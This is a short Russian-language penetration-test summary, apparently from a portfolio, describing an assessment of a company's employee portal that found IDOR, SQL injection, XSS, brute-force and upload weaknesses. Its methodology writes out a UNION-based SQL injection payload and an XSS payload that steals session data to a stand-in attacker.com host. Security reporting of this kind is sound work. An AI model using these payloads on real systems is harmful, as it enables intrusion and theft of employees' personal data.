Задача: Крупная компания хотела проверить безопасность внутреннего портала сотрудников. Что было найдено: IDOR уязвимость в API: можно было получить данные любого сотрудника SQL Injection в форме поиска через UNION-based атаку XSS в комментариях с возможностью кражи сессий Слабая защита от брутфорса (3 попытки, но без блокировки IP) Недостаточная валидация загрузки файлов Методика: IDOR: изменил ID пользователя в запросе с /api/user/123 на /api/user/1 (админ) SQL Injection: использовал ' UNION SELECT username,password FROM users-- XSS: внедрил fetch('/api/sessions').then(r=>r.json()).then(d=>fetch('attacker.com/steal?data='+btoa(JSON.stringify(d)))) Брутфорс: использовал Hydra для подбора паролей админов Инструменты: Burp Suite Pro, SQLMap, Hydra, OWASP ZAP, Custom Python скрипты Результат: Получил доступ к админ-панели, базам данных с персональными данными 10,000+ сотрудников. Время: 2 дня.